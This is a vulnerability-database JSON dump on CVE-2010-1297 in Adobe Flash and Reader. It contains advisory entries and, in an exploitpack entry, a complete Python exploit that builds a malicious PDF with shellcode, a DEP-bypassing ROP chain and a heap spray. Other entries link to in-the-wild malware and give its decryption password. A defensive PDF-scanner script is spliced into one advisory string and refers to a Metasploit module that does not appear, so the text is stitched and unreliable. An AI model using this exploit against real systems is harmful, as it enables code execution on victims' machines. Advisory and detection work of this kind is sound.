<http://www.f-secure.com/weblog/archives/00001962.html>\n * <http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>\n * <http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of the CERT/CC. It has also been independently discovered and exploited in the wild.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-1297](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-1297>) \n---|--- \n**Severity Metric:** | 43.09 \n**Date Public:** | 2010-06-04 \n**Date First Published:** | 2010-06-07 \n**Date Last Updated: ** | 2012-03-28 14:47 UTC \n**Document Revision: ** | 47 \n", "modified": "2012-03-28T14:47:00", "published": "2010-06-07T00:00:00", "id": "VU:486225", "href": "https://www.kb.cert.org/vuls/id/486225", "type": "cert", "title": "Adobe Flash ActionScript AVM2 newfunction vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T17:19:51", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "edition": 2, "description": "Added: 06/17/2010 \nCVE: [CVE-2010-1297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297>) \nBID: [40586](<http://www.securityfocus.com/bid/40586>) \nOSVDB: [65141](<http://www.osvdb.org/65141>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in `**authplay.dll**` provided with Adobe Reader 9.3.2 and earlier 9.x versions allows command execution when a user opens a specially crafted PDF file that contains Shockwave Flash (SWF) content that calls the `**newfunction()**` function with invalid parameters. 
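The PDF wrapper that the Metasploit module's `make_pdf` builds above (a RichMedia annotation, Flash RichMediaSettings, an EmbeddedFile stream carrying the SWF, and a JavaScript OpenAction whose stream is deflate-compressed ASCIIHex text) is the same layout the SAINT entry describes, and it can be triaged statically. The scanner below is an added example written for this page, not code from Metasploit, Abysssec, SAINT or CERT. It undoes the `#xx` name obfuscation that the module's `n_obfu` emits, decodes the `[/FlateDecode/ASCIIHexDecode]` chain to look for the heap-spray idiom, and checks embedded-file streams for the `FWS`/`CWS` SWF magic. The sample PDF it is tested against is constructed here: it has the same object layout but carries only a 3-byte SWF header and a harmless JavaScript string, no bytecode and no exploit.

```python
# Added example for this page (not code from Metasploit, Abysssec or SAINT):
# static triage of a PDF for the SWF-in-RichMedia plus JavaScript-OpenAction
# layout that the CVE-2010-1297 exploit documents above are built from.
import re
import zlib

# Indicators taken from the PDF dictionaries shown on the page.
NAME_INDICATORS = {
    b"/Subtype/RichMedia": "RichMedia annotation",
    b"/Subtype/Flash": "Flash rich-media settings/instance",
    b"/Type/EmbeddedFile": "embedded file stream (SWF carrier)",
    b"/S/JavaScript": "JavaScript action",
    b"/OpenAction": "action run automatically on open",
}
OBJ_RE = re.compile(rb"(\d+)\s+0\s+obj(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
# 'while (x.length ...) x += x': the string-doubling loop both sprays use
SPRAY_RE = re.compile(rb"while\s*\([^)]*\.length[^)]*\)\s*\w+\s*\+=\s*\w+")


def normalize_names(dictionary: bytes) -> bytes:
    """Undo the '#xx' name escapes that n_obfu() emits (/#54ype -> /Type) and
    drop whitespace between a name and a following name, so '/Subtype /Flash'
    and '/Subtype/Flash' compare equal.  Call this on dictionary text only,
    never on raw stream bytes."""
    unhexed = re.sub(rb"#([0-9A-Fa-f]{2})",
                     lambda m: bytes([int(m.group(1), 16)]), dictionary)
    return re.sub(rb"(/[A-Za-z0-9]+)\s+(?=/)", rb"\1", unhexed)


def decode_stream(dictionary: bytes, stream: bytes) -> bytes:
    """Apply the /Filter chain in order.  The module stores the JS as
    deflate(ascii_hex(js)) with random whitespace between hex pairs and
    declares [/FlateDecode/ASCIIHexDecode], so decoding inflates first."""
    data = stream
    for name in re.findall(rb"/(FlateDecode|ASCIIHexDecode)", dictionary):
        if name == b"FlateDecode":
            data = zlib.decompress(data)
        else:
            digits = re.sub(rb"\s", b"", data.split(b">", 1)[0])
            if len(digits) % 2:             # PDF allows a dangling final digit
                digits += b"0"
            data = bytes.fromhex(digits.decode("ascii"))
    return data


def scan_pdf(pdf: bytes) -> dict:
    """Map object number -> list of indicator strings for suspicious objects."""
    findings = {}
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(2)
        sm = STREAM_RE.search(body)
        head = normalize_names(body[:sm.start()] if sm else body)
        stream = sm.group(1) if sm else b""
        hits = [label for key, label in NAME_INDICATORS.items() if key in head]
        if b"/Type/EmbeddedFile" in head and stream[:3] in (b"FWS", b"CWS"):
            hits.append("embedded SWF (%s header)" % stream[:3].decode())
        if stream and b"/Filter" in head:
            try:
                text = decode_stream(head, stream)
            except (zlib.error, ValueError):
                text = b""
            if b"unescape" in text and SPRAY_RE.search(text):
                hits.append("JavaScript heap-spray pattern")
        if hits:
            findings[num] = hits
    return findings


def build_sample_pdf() -> bytes:
    """Constructed, benign stand-in for the test: the module's object layout and
    name obfuscation, a FlateDecode+ASCIIHexDecode JS stream, and an 'embedded
    file' that is nothing but a 3-byte SWF magic."""
    js = b"var c = unescape('%u0c0c%u0c0c'); while (c.length < 0x1000) c+=c;"
    js_stream = zlib.compress(js.hex().encode("ascii") + b">")
    swf_stub = b"CWS" + b"\x00" * 13                   # constructed, no bytecode
    objs = [
        b"<</#54ype/Catalog/Pages 2 0 R/Open#41ction 4 0 R>>",
        b"<</Type/Pages/Count 1/Kids [3 0 R]>>",
        b"<</Type/Page/Parent 2 0 R/Annots [6 0 R]>>",
        b"<</Type/Action/S/#4aavaScript/JS 5 0 R>>",
        b"<</Length %d/Filter[/FlateDecode/ASCIIHexDecode]>>\nstream\n" % len(js_stream)
        + js_stream + b"\nendstream",
        b"<</Type/Annot/Subtype /Rich#4dedia/RichMediaSettings 7 0 R>>",
        b"<</Type/RichMediaSettings/Subtype /Flash>>",
        b"<</Type/EmbeddedFile/Length %d>>\nstream\n" % len(swf_stub)
        + swf_stub + b"\nendstream",
    ]
    out = b"%PDF-1.5\n"
    for num, body in enumerate(objs, 1):
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return out + b"trailer<</Root 1 0 R>>\n%%EOF\n"


if __name__ == "__main__":
    for num, hits in sorted(scan_pdf(build_sample_pdf()).items()):
        print("obj %d: %s" % (num, "; ".join(hits)))
```

Run it on a real file with `scan_pdf(open(path, "rb").read())`. The regex object walk is deliberately forgiving (no xref parsing, no object streams), which is what you want for triage of hostile input: a sample whose xref table is broken still yields its dictionaries. Any object that combines a Flash RichMedia annotation with an embedded SWF and a JavaScript OpenAction is worth detonating in an isolated Reader 9 instance rather than opening.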
\n\n### Resolution\n\nApply the patches referenced in [APSA10-01](<http://www.adobe.com/support/security/advisories/apsa10-01.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://secunia.com/advisories/40034> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.0. \n\nThe user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-17T00:00:00", "published": "2010-06-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_authplaydll_newfunction", "id": "SAINT:770782F23BE978D80AAD6E9F9088C70A", "type": "saint", "title": "Adobe Reader authplay.dll newfunction Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:01", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "description": "Added: 06/17/2010 \nCVE: [CVE-2010-1297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297>) \nBID: [40586](<http://www.securityfocus.com/bid/40586>) \nOSVDB: [65141](<http://www.osvdb.org/65141>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in `**authplay.dll**` provided with Adobe Reader 9.3.2 and earlier 9.x versions allows command execution when a user opens a specially crafted PDF file that contains Shockwave Flash (SWF) content that calls the `**newfunction()**` function with invalid parameters. \n\n### Resolution\n\nApply the patches referenced in [APSA10-01](<http://www.adobe.com/support/security/advisories/apsa10-01.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://secunia.com/advisories/40034> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.0. 
\n\nThe user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-06-17T00:00:00", "published": "2010-06-17T00:00:00", "id": "SAINT:4087FA9BA2E83B1761565A4E280BC32F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_authplaydll_newfunction", "type": "saint", "title": "Adobe Reader authplay.dll newfunction Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "description": "Added: 06/17/2010 \nCVE: [CVE-2010-1297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297>) \nBID: [40586](<http://www.securityfocus.com/bid/40586>) \nOSVDB: [65141](<http://www.osvdb.org/65141>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in `**authplay.dll**` provided with Adobe Reader 9.3.2 and earlier 9.x versions allows command execution when a user opens a specially crafted PDF file that contains Shockwave Flash (SWF) content that calls the `**newfunction()**` function with invalid parameters. \n\n### Resolution\n\nApply the patches referenced in [APSA10-01](<http://www.adobe.com/support/security/advisories/apsa10-01.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://secunia.com/advisories/40034> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.0. \n\nThe user must open the exploit file in Adobe Reader. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-06-17T00:00:00", "published": "2010-06-17T00:00:00", "id": "SAINT:77C0093237F1AF8B89C92BAD6DF70E05", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_authplaydll_newfunction", "title": "Adobe Reader authplay.dll newfunction Memory Corruption", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Acrobat Reader and Flash Player - newclass Invalid Pointer", "edition": 1, "published": "2010-09-01T00:00:00", "title": "Adobe Acrobat Reader and Flash Player - newclass Invalid Pointer", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-09-01T00:00:00", "id": "EXPLOITPACK:4125F09B17C03F68D9E1171B95C97590", "href": "", "sourceData": "'''\n __ __ ____ _ _ ____ \n | \\/ |/ __ \\ /\\ | | | | _ \\ \n | \\ / | | | | / \\ | | | | |_) |\n | |\\/| | | | |/ /\\ \\| | | | _ < Day 1 (Binary Analysis)\n | | | | |__| / ____ \\ |__| | |_) |\n |_| |_|\\____/_/ \\_\\____/|____/ \n\nhttp://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz)\n\n Title : Adobe Acrobat Reader and Flash Player \u201cnewclass\u201d invalid pointer vulnerability\n Analysis : http://www.abysssec.com\n Vendor : http://www.adobe.com\n Impact : Ciritical\n Contact : shahin [at] abysssec.com , info [at] abysssec.com\n Twitter : @abysssec\n CVE : CVE-2010-1297\n MOAUB Number : MOAUB-01-BA\n'''\n\nimport sys\n\nclass PDF:\n \n\tdef __init__(self):\n\t\tself.xrefs = []\n\t\tself.eol = '\\x0a'\n\t\tself.content = ''\n\t\tself.xrefs_offset = 0\n\t\t\n\tdef header(self):\n\t\tself.content += '%PDF-1.6' + self.eol\n\t\t\n\tdef obj(self, obj_num, data,flag):\n\t\tself.xrefs.append(len(self.content))\n\t\tself.content += '%d 0 obj' 
% obj_num\n\t\tif flag == 1:\n\t\t\tself.content += self.eol + '<< ' + data + ' >>' + self.eol\n\t\telse:\n\t\t\tself.content += self.eol + data + self.eol\n\t\tself.content += 'endobj' + self.eol\n\n\tdef obj_SWFStream(self, obj_num, data, stream):\n\t\tself.xrefs.append(len(self.content))\n\t\tself.content += '%d 0 obj' % obj_num\n\t\tself.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))\n\t\tself.content += ' >>' + self.eol\n\t\tself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol\n\t\tself.content += 'endobj' + self.eol\n\t\n\tdef obj_Stream(self, obj_num, data, stream):\n\t\tself.xrefs.append(len(self.content))\n\t\tself.content += '%d 0 obj' % obj_num\n\t\tself.content += self.eol + '<< ' + data + '/Length %d' %len(stream)\n\t\tself.content += ' >>' + self.eol\n\t\tself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol\n\t\tself.content += 'endobj' + self.eol\n\t\t\n\tdef ref(self, ref_num):\n\t\treturn '%d 0 R' % ref_num\n\t\t\n\tdef xref(self):\n\t\tself.xrefs_offset = len(self.content)\n\t\tself.content += 'xref' + self.eol\n\t\tself.content += '0 %d' % (len(self.xrefs) + 1)\n\t\tself.content += self.eol\n\t\tself.content += '0000000000 65535 f' + self.eol\n\t\tfor i in self.xrefs:\n\t\t\tself.content += '%010d 00000 n' % i\n\t\t\tself.content += self.eol\n \n\tdef trailer(self):\n\t\tself.content += 'trailer' + self.eol\n\t\tself.content += '<< /Size %d' % (len(self.xrefs) + 1)\n\t\tself.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol\n\t\tself.content += 'startxref' + self.eol\n\t\tself.content += '%d' % self.xrefs_offset\n\t\tself.content += self.eol\n\t\tself.content += '%%EOF'\n\t\t\n\tdef generate(self):\n\t\treturn self.content\n\n\n\t\t\n\t\t\nclass Exploit:\n \n def convert_to_utf16(self, payload):\n enc_payload = ''\n for i in range(0, len(payload), 2):\n num = 0\n for j in range(0, 2):\n num += (ord(payload[i + j]) & 
0xff) << (j * 8)\n enc_payload += '%%u%04x' % num\n return enc_payload\n \n def get_payload(self): \t\n # shellcode calc.exe\n payload =(\"\\x90\\x90\\x90\\x89\\xE5\\xD9\\xEE\\xD9\\x75\\xF4\\x5E\\x56\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\n\t \"\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5A\\x6A\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6B\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\"\n\t\t \"\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4A\\x49\\x4B\\x4C\\x4B\\x58\\x51\\x54\\x43\\x30\\x43\\x30\\x45\\x50\\x4C\\x4B\\x51\\x55\\x47\\x4C\\x4C\\x4B\\x43\\x4C\"\n\t\t \"\\x43\\x35\\x44\\x38\\x45\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x44\\x58\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x45\\x51\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C\"\n\t\t \"\\x4B\\x43\\x31\\x4A\\x4E\\x46\\x51\\x49\\x50\\x4A\\x39\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x42\\x54\\x45\\x57\\x49\\x51\\x48\\x4A\\x44\\x4D\\x45\\x51\\x49\\x52\"\n\t\t \"\\x4A\\x4B\\x4B\\x44\\x47\\x4B\\x46\\x34\\x46\\x44\\x45\\x54\\x43\\x45\\x4A\\x45\\x4C\\x4B\\x51\\x4F\\x47\\x54\\x43\\x31\\x4A\\x4B\\x43\\x56\\x4C\\x4B\\x44\"\n\t\t \"\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C\\x4C\\x4B\\x43\\x31\\x4A\\x4B\\x4C\\x49\\x51\\x4C\\x47\\x54\\x45\\x54\"\n\t\t \"\\x48\\x43\\x51\\x4F\\x46\\x51\\x4C\\x36\\x43\\x50\\x46\\x36\\x45\\x34\\x4C\\x4B\\x50\\x46\\x50\\x30\\x4C\\x4B\\x47\\x30\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45\"\n\t\t \"\\x4C\\x4E\\x4D\\x4C\\x4B\\x42\\x48\\x44\\x48\\x4D\\x59\\x4B\\x48\\x4B\\x33\\x49\\x50\\x43\\x5A\\x46\\x30\\x45\\x38\\x4C\\x30\\x4C\\x4A\\x45\\x54\\x51\\x4F\"\n\t\t \"\\x42\\x48\\x4D\\x48\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x50\\x57\\x4B\\x4F\\x4A\\x47\\x43\\x53\\x47\\x4A\\x51\\x4C\\x50\\x57\\x51\\x59\\x50\\x4E\\x50\\x44\\x50\"\n\t\t \"\\x4F\\x46\\x37\\x50\\x53\\x51\\x4C\\x43\\x43\\x42\\x59\\x44\\x33\\x43\\x44\\x43\\x55\\x42\\x4D\\x50\\x33\\x50\\x32\\x51\\x4C\\x42\\x43\\x45\\x31\\x42\\x4C\"\n\t\t \"\\x42\\x43\\x46\\x4E\\x45\\x35\\x44\\x38\\x42\\x45\\x43\\x30\\x41\\x41\")\n 
return payload\n\n\n def getSWF(self):\n try:\n #swfFile = sys.argv[2]\n fdR = open('flash.swf', 'rb+')\n strTotal = fdR.read()\n str1 = strTotal[:88]\n addr1 = '\\x06\\xa6\\x17\\x30' # addr = 0c0c0c0c\t\t\t\n str2 = strTotal[92:533]\n\t\t\t#*************************** Bypass DEP by VirtualProtect ********************************\n rop = ''\n rop += \"\\x77\\xFA\\x44\\x7E\" # mov edi,esp ret 4\n rop += \"\\x94\\x28\\xc2\\x77\"\t #add esp,20 pop ebp ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xD4\\x1A\\x80\\x7C\" # VirtualProtect\n rop += \"BBBB\"\t\t\t # Ret Addr for VirtualProtect\n rop += \"CCCC\"\t\t\t # Param1\t(lpAddress)\n rop += \"DDDD\"\t\t\t # Param2\t(Size)\n rop += \"EEEE\"\t\t\t # Param3\t(flNewProtect)\n rop += \"\\x10\\xB0\\xEF\\x77\" # Param4 (Writable Address)\n rop += \"AAAAAAAAAAAA\"\t\t #padding\n rop += \"\\xC2\\x4D\\xC3\\x77\"\t #mov eax,edi pop esi ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xF2\\xE1\\x12\\x06\"\t #add eax,94 ret\n rop += \"\\x70\\xDC\\xEE\\x77\" #push esp pop ebp ret4\n rop += \"\\x16\\x9A\\x94\\x7C\"\t #mov [ebp-30],eax ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xC2\\x4D\\xC3\\x77\" #mov eax,edi pop esi ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xF2\\xE1\\x12\\x06\"\t #add eax,94 ret\n rop += \"\\x79\\x9E\\x83\\x7C\"\t #mov [ebp-2c],eax ret\n rop += \"\\x27\\x56\\xEA\\x77\"\t #mov eax,6b3 ret\n rop += \"\\x14\\x83\\xE0\\x77\"\t #mov [ebp-28],eax ret\n rop += \"\\xB4\\x01\\xF2\\x77\"\t #xor eax,eax ret\n rop += \"\\x88\\x41\\x97\\x7C\"\t #add eax,40 pop ebp ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\x70\\xDC\\xEE\\x77\"\t #push esp pop ebp ret4\n rop += \"\\xC0\\x9E\\xEF\\x77\"\t #mov [ebp-54],eax ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xC2\\x4D\\xC3\\x77\"\t #mov eax,edi pop esi ret\n rop += \"AAAA\"\t\t\t\t #padding\n rop += \"\\xC1\\xF2\\xC1\\x77\"\t #add eax,8 ret\n rop += \"\\xCF\\x97\\xDE\\x77\"\t #xchg eax,esp ret\n\t\t\t\n str3 = strTotal[669:1249]\n alignESP = 
\"\\x83\\xc4\\x03\"\n sc = self.get_payload()\n\t\t\t\n if len(sc) > 2118:\n print \"[*] Error : payload length is long\"\n return\n if len(sc) <= 2118:\n dif = 2118 - len(sc)\n while dif > 0 :\n sc += '\\x90'\n dif = dif - 1\n\t\t\t\n str4 = strTotal[3370:3726]\n\t\t\t\n addr2 = '\\xF2\\x3D\\x8D\\x23' # Enter 0C75 , 81 RET\t\n\t\t\t\n str5 = strTotal[3730:]\n\t\t\t\n fdW= open('exploit.swf', 'wb+')\n finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5\n fdW.write(finalStr)\t\n \t\t\n #strTotal = open('exploit.swf', 'rb+').read()\n fdW.close()\n fdR.close()\n return finalStr\n \n except IOError:\n print '[*] Error : An IO error has occurred'\n\t\t\n def HeapSpray(self):\n spray = '''\t\n function spray_heap()\n {\n var chunk_size, payload, nopsled;\n \n chunk_size = 0x1A0000;\n pointers = unescape(\"%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030\");\n pointerSled = unescape(\"<Contents>\");\n while (pointerSled.length < chunk_size)\n pointerSled += pointerSled;\n pointerSled_len = chunk_size - (pointers.length + 20); \n 
pointerSled = pointerSled.substring(0, pointerSled_len);\n heap_chunks = new Array();\n for (var i = 0 ; i < <CHUNKS> ; i++)\n heap_chunks[i] = pointerSled + pointers;\n } \n \n \n spray_heap(); \n '''\n\t\t\n spray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX\n '''\nAuthplay.dll\n\t\t\n303033DD ? 87DC XCHG ESP,EBX\n\n#############################################################\n\t\t\t\t\t will do nothing\t\n\n303033DF ? 45 INC EBP\n303033E0 ? 05 00898784 ADD EAX,84878900 \n303033E5 ? 42 INC EDX\n303033E6 ? 05 008987E8 ADD EAX,E8878900\n303033EB ? 41 INC ECX\n303033EC ? 05 008987EC ADD EAX,EC878900\n303033F1 ? 41 INC ECX\n303033F2 ? 05 008987F0 ADD EAX,F0878900\n303033F7 ? 41 INC ECX\n303033F8 ? 05 008987F4 ADD EAX,F4878900\n303033FD ? 41 INC ECX\n303033FE ? 05 005F5E5D ADD EAX,5D5E5F00\n30303403 . B8 01000000 MOV EAX,1\n30303408 . 5B POP EBX\n############################################################\n\n30303409 . 83C4 30 ADD ESP,30\n3030340C . C3 RETN\n\n '''\n\n spray = spray.replace('<CHUNKS>', '40') #Chunk count\n return spray\n\t\t\ndef generate_pdf():\n\texploit = Exploit()\n\tswfFile = 'exploit.swf'\n\tpdf = PDF()\n\tpdf.header()\n\tpdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)\n\t#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)\n\tpdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)\n\tpdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + \" /Type/Page\"+' /Contents '+pdf.ref(4) ,1)\n\tpdf.obj_Stream(4, '','')\n\tpdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)\n\tpdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) \n\tpdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)\n\tpdf.obj(8, '/Type 
/RichMediaActivation /Condition /PO ',1)\t\n\tpdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)\t\n\tpdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)\t\n\tpdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)\t\n\tpdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)\t\n\tpdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)\n\tpdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() ) \n\tpdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)\n\tpdf.obj_Stream(16, '<</Length 0 >> ','') \n\tpdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) \n\t\n\tpdf.xref()\n\tpdf.trailer()\n\treturn pdf.generate()\n\t\ndef main():\n\tif len(sys.argv) != 2:\n\t\tprint 'Usage: python %s [output file name]' % sys.argv[0]\n\t\tsys.exit(0)\n\tfile_name = sys.argv[1]\n\tif not file_name.endswith('.pdf'):\n\t\tfile_name = file_name + '.pdf'\n\ttry:\n\t\tfd = open(file_name, 'wb+')\n\t\tfd.write(generate_pdf())\n\t\tfd.close()\n\t\tprint '[-] PDF file generated and written to %s' % file_name\n\texcept IOError:\n\t\tprint '[*] Error : An IO error has occurred'\n\t\tprint '[-] Exiting ...'\n\t\tsys.exit(-1)\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash Reader - Live Malware", "edition": 1, "published": "2010-06-09T00:00:00", "title": "Adobe Flash Reader - Live Malware", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-09T00:00:00", "id": "EXPLOITPACK:8E576C4816C791FE420A43AC52B86332", "href": "", "sourceData": "# Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/\n\n# File is malicious! Taken from the wild! 
Beware!\n# To decrypt the file:\n# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar\n# Password is \"edb\" without the quotes.\n\nNOTE: This was taken out of live malware and was not modified. BEWARE.\n\nBy visiting the following link, you agree that you are responsible for any damages that occur.\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:10:38", "description": "No description provided by source.", "published": "2010-06-09T00:00:00", "type": "seebug", "title": "0day Exploit for Adobe Flash and Reader PoC (from the wild)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19759", "id": "SSV:19759", "sourceData": "\n Download: N/A\r\nview source\r\nprint?\r\n# EDB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/\r\n# File is malicious! Taken from the wild! Beware!\r\n# To decrypt the file:\r\n# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar\r\n# Password is "edb" without the quotes.\r\n \r\nNOTE: This was taken out of live malware and was not modified. 
